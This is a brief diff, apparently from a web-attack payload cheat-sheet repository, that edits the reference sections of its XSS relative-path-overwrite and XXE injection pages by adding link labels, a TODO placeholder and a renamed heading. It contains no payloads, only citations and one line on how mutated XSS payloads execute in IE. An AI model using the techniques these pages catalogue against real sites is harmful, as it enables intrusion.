-- [](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)
+- [XSS without HTML - CSTI with Angular JS - Portswigger](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs)

XSS injection/XSS with Relative Path Overwrite.md

@@ -42,3 +42,8 @@ From : `http://www.thespanner.co.uk/2014/03/21/rpo/`
 ```
 
 IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
+
+
+## References
+
+- [TODO](TODO)

XXE injection/README.md

@@ -188,7 +188,7 @@ JPG (experimental)
 GIF (experimental)
 ```
 
-## Thanks to
+## References
 
 * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
 * [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)